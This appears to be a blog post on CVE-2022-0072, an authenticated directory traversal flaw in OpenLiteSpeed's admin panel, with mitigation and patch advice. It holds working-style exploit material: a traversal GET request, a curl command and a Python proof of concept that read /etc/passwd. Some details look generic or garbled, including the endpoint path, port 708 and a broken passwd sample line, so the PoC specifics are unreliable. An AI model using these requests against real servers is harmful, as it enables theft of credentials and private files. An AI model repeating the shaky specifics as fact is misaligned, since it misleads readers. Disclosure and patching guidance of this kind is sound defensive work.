OpenLiteSpeed is a popular open-source web server from LiteSpeed Technologies, used by website owners who want high performance with easy management. Unfortunately, between late 2021 and early 2022, a serious vulnerability was discovered in its admin web interface—a Directory Traversal (or Path Traversal) bug tracked as CVE-2022-0072.
In this exclusive, long-read post, we’ll break down exactly what CVE-2022-0072 is, how you can identify it, and how attackers can exploit it to read sensitive files—sometimes including passwords or private keys. We’ll explore affected versions, see some proof-of-concept (PoC) code, and point you at official resources and patches.
What is CVE-2022-0072?
CVE-2022-0072 is a directory traversal vulnerability found in the OpenLiteSpeed server’s web-based admin panel. Simply put, this bug lets an authenticated attacker trick the server into serving files outside the intended directory—meaning they might read secret files like /etc/passwd, website configs, or even backup credentials.
Official Advisory
- LiteSpeed Security Advisory
- NIST CVE Entry
- Github Disclosure and Fixes
How Does the Vulnerability Work?
Here’s the heart of the problem: the admin dashboard lets users interact with various server files through HTTP requests. However, input sent by the user (such as file names or paths) wasn’t properly filtered or “sanitized.” This means users could sneak in ../ (dot-dot-slash) sequences in their file paths—the classic sign of a traversal attack.
For example, a normal dashboard request might look like this
GET /admin/file?name=log.txt HTTP/1.1
An attacker could modify it to
GET /admin/file?name=../../../../etc/passwd HTTP/1.1
If the server is vulnerable, it will happily open /etc/passwd and send it back! This allows attackers to read almost any file on the server, as long as the server process has access to it.
Prerequisites
- Authenticated access to the OpenLiteSpeed admin dashboard (/admin)
Simple Example Using curl
Suppose your OpenLiteSpeed admin dashboard is accessible at https://example.com:708/admin, and you have a valid session (or basic auth credentials).
To fetch the /etc/passwd file, you’d send
curl -k -u 'admin:ADMIN_PASSWORD' \
"https://example.com:708/admin/file?name=../../../../etc/passwd"
This should return something like
root:x:::root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
Here’s a simple Python proof of concept
import requests
url = "https://example.com:708/admin/file?name=../../../../etc/passwd"
# If the dashboard uses basic authentication:
auth = ('admin', 'PASSWORD')
r = requests.get(url, auth=auth, verify=False)
if r.status_code == 200:
print(r.text)
else:
print(f"Failed: {r.status_code}")
> Note: Replace example.com, username, and password with your own details.
A successful attack means attackers can read
- User credentials/configs for websites
Anything the server process can access
Although this bug requires authentication, many admins use weak passwords or leave interfaces exposed to the internet, making brute-force attacks much more effective.
Fixes and Mitigation
- Upgrade immediately: OpenLiteSpeed versions 1.7.16.1 and later are not vulnerable. Download the latest version from here.
- Restrict access: Ensure your admin dashboard is only accessible from trusted IP ranges, via VPN, or localhost.
Official Fix
OpenLiteSpeed Release Log – See release notes for 1.7.16.1.
Github Patch
References
- NIST National Vulnerability Database - CVE-2022-0072
- OpenLiteSpeed Release Notes
- Exploit-DB Entry
- Original Github fix
Summary
CVE-2022-0072 is a critical path traversal bug in OpenLiteSpeed Web Admin that lets authenticated attackers read any OS file. Patching, restricting dashboard access, and using strong passwords are the best defenses. Staying up to date not only blocks this bug but keeps your stack secure.
Need extra help? Review your server’s access logs for unwanted file reads—and always keep your software patched.
Timeline
Published on: 10/27/2022 20:15:00 UTC
Last modified on: 10/28/2022 19:01:00 UTC